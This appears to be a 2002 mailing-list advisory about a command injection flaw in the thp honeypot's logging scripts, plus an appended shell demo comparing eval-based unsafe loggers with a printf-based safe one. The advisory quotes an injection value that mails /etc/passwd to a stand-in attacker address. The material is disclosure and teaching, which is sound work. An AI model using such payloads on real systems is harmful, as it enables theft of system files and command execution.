From: George Bakos (gbakos@ists.dartmouth.edu)
Date: Tue Apr 23 2002 - 12:30:48 CDT
There is a vulnerability with the way thp reads data from the intruder's
keystrokes & either logs or returns a response. It allows an attacker to execute
commands on the thp host with user "nobody" privilege.
EXPLANATION
In shell, "read VAR ;echo $VAR > file" seems innocuous at first, however, entering
a value of "$(cat /etc/passwd | mail badguy@oops.net -s oops)" will do just that.
Quoting is easily circumvented by including the required closing quotes in the
value entered, thus ineffective.
This problem exists in a number of locations in logthis and thpsvcs.
I'm fixing the problem by using stty to return the keystrokes individually,
treating carriage returns as a character and returning the prompt on its presence.
I'll have it posted later today.
Until then, I have shut down the webserver alpinista.dyndns.org:81 and advise any
thp users to turn off xinetd until the fix is available. I'll notify the list
when it is ready.
gb
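
Added example, not part of the original message and not thp's code: a logging routine that lets entered text be parsed by the shell a second time, next to one that treats it purely as data. The function names, the `session.log` file and the use of `eval` as the re-parsing step are assumptions; the input is constructed and only creates a marker file in a temporary directory.

```shell
#!/bin/sh
# Hypothetical logging helpers. $1 = text entered by the remote user, $2 = log file.

# Unsafe: the text is spliced into a command string that the shell parses again.
log_unsafe() {
    eval "echo $1 >> \"$2\""
}

# Still unsafe: inside double quotes, $( ) is expanded when the string is re-parsed.
log_quoted() {
    eval "echo \"$1\" >> \"$2\""
}

# Safe: the text is expanded once, quoted, and only ever passed as an argument.
log_safe() {
    printf '%s\n' "$1" >> "$2"
}

# Run one logger against the constructed input and report what happened.
# The body is a subshell, so the cd and the variables do not leak out.
demo() (
    dir=$(mktemp -d) || exit 1
    cd "$dir" || exit 1
    # read -r with an empty IFS keeps the line byte-for-byte; the quoted
    # here-doc delimiter stops the shell from expanding it here.
    IFS= read -r line <<'EOF'
$(touch marker)
EOF
    "$1" "$line" session.log
    if [ -e marker ]; then
        echo executed
    elif grep -qxF -- "$line" session.log; then
        echo logged-as-text
    else
        echo lost
    fi
    cd / && rm -rf "$dir"
)

for f in log_unsafe log_quoted log_safe; do
    printf '%s: %s\n' "$f" "$(demo "$f")"
done
```
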